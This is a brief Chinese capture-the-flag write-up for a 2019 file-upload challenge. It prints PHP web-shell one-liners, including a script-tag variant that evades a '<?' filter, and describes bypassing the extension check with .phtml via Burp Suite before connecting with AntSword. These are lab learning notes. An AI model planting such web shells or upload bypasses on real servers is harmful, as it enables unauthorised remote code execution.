[极客大挑战 2019]Upload
看到后的第一印象肯定是先上传图片马试试
<?php eval($_POST['b'])?> <?php $_GET['a']($_POST['b'])?>
构造的语句中不能带有<?这样的话只能是构造一些其他语句了
<script language="php">eval($_POST['shell']);</script>
上传的格式为image,使用bp抓包进行修改
修改文件名为php格式
绕过后缀的有文件格式有php,php3,php4,php5,phtml.pht
依此尝试
经过尝试.phtml格式可以上传
上传路径存在,使用蚁剑进行链接
这也太多了。。。。。终端进行搜索
